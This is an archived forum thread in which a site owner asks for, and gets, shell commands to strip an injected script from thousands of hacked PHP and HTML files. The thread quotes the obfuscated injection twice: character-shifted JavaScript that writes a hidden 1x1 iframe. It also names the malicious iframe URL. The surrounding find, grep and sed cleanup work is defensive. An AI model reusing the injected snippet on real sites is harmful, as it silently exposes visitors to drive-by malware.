Complex find grep or sed command

sjburden · #1 (**permalink**) 05-31-2008

Haven't worked in bash for ages. did a good bit of shell scripting in regular sh, but have forgotten most of it.

I have several thousand php files that now include the following line at the end of the file. There is no LF or CR/LF before it begins, it is just concatenated to the final line of the file:

Code:

<?php echo '<script type="text/javascript">function count(str){var res = "";for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); res += String.fromCharCode(n - (2)); } return res; }; document.write(count(">khtcog\"ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr\"ykfvj?3\"jgkijv?3\"htcogdqtfgt?2@"));</script>';?>

I have tried about every find -exec grep, and sed command I can think of, but no joy!

I simply want to delete the line to the EOF in each file.

anyone have a quick solution?

Thanks!

--Steve

ripat · #2 (**permalink**) 05-31-2008

Quite straight forward with sed:

file:

Code:

un
deux
trois
quatre<?php code to delete ?>

Code:

$ sed 's/<?php code to delete ;?>$//' file
> un
> deux
> trois
> quatre

If, as I can see, you have forward slashes in the string to delete, escape them or use another separator in sed like:

Code:

$ sed 's#<?php code to delete ;?>$##' file

You can also shorten the search pattern using regex "wild cards":

Code:

$ sed 's/<?php co.+lete ;?>$//' file

But be careful to be specific enough otherwise you will delete important lines that might match the pattern.

Finaly, when you are satisfied with the result, you can loop through all your files using the "in line" sed switch:

Code:

sed -i 's/pattern/replace/' file

But be double careful here. Once you run the command, no way back. So backup you files first!

xxmenxx · #3 (**permalink**) 05-31-2008

Try this

Code:

for file in php1 php2 php3 ...
do
sed -e '$d' $file > $file.tmp
rm $file
mv $file.tmp $file
done

Replace php1 php2 php3 ... wth your files

sjburden · #4 (**permalink**) 05-31-2008

Well, thanks to you all, finally got it done: Didn't fix my whole problem (site hack through sql injection) but does what needs to be done;

the originals are:

Code:

PHP:
<?php echo '<script type="text/javascript">function count(str){var res = "";for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); res += String.fromCharCode(n - (2)); } return res; }; document.write(count(">khtcog\"ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr\"ykfvj?3\"jgkijv?3\"htcogdqtfgt?2@"));</script>';?>

Code:

HTML:
<script type="text/javascript">function count(str){var res = '';for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); res += String.fromCharCode(n - (2)); } return res; }; document.write(count('>khtcog"ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr"ykfvj?3"jgkijv?3"htcogdqtfgt?2@'));</script>

here are the finals:

Code:

# this does the whole html piece: finds the files, then makes a copy of them appending .123bu456, then checks to see if they have an \n between the last line of real tags and the start of the hack; 
# if not, adds one, if so, ignores it; last it deletes the last line of the file which matches the find critera. It also ignores the .123bu456 files, if any are  already in existance, so it can safely be run more than once without
# creating numerous duplicate files..
find . \! \( -name '*.123bu456' -prune \) -exec grep -q "htcogdqtfgt?2@'));</script>" '{}' \; -print  |while read line; do file=$(cp ${line} ${line}.123bu456; sed -i 's#</html><script #</html>\n<script #g' ${line}; sed -i '$d' ${line} ); done

Code:

# this does the whole php piece: finds the files, then makes a copy of them appending .123bu456, then checks to see if they have an \n between the last line of real tags and the start of the hack; 
# if not, adds one, if so, ignores it; last it deletes the last line of the file which matches the find critera. It also ignores the .123bu456 files, if any are  already in existance, so it can safely be run more than once without
# creating numerous duplicate files..
find . \! \( -name '*.123bu456' -prune \) -exec grep -q "<?php echo '<script type=\"text/javascript\">function count(str){var res = \"\";for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); res += String.fromCharCode(n - (2)); } return res; }; document.write(count(\">khtcog" '{}' \; -print |while read line; do file=$(cp ${line} ${line}.123bu456; sed -i 's#<?php echo #\n<?php echo #g' ${line}; sed -i '$d' ${line} ); done

Not pretty, but does the job! Thanks!

Cause was a hack into a WordPress site (2.3.2); problem was, there are four sites on that domain: one asp, two WordPress (2.3 and 2.5) and a new, Joomla 1.5.2. When it got in, it was able to infect all the html/htm and all the php...have found nothing else, so far. But none of the sites are 'right' So far no more trojan problems from the target site (using an iframe):

Code:

http://www.wp-stats-php.info/iframe/wp-stats.php

Thanks again for the help!

More UNIX and Linux Forum Topics You Might Find Helpful
Thread	Thread Starter	Forum	Replies	Last Post
complex grep command	naamas03	Shell Programming and Scripting	0	11-21-2007 04:59 AM
Find Exactly word in grep command	koti_rama	UNIX for Dummies Questions & Answers	4	08-23-2007 06:52 AM
Search / Find / grep command ...	videsh77	UNIX for Dummies Questions & Answers	4	02-22-2007 09:38 AM
Find command with Grep	venu_nbk	UNIX for Dummies Questions & Answers	10	10-16-2006 08:21 PM
advanced/complex uses of the find command	Perderabo	Answers to Frequently Asked Questions	0	05-04-2004 01:13 PM

Thread Tools	Search this Thread
Show Printable Version Email this Page	Search this Thread: Advanced Search
Display Modes	Rate This Thread
Switch to Linear Mode Hybrid Mode Switch to Threaded Mode	Rate This Thread:


	Powered by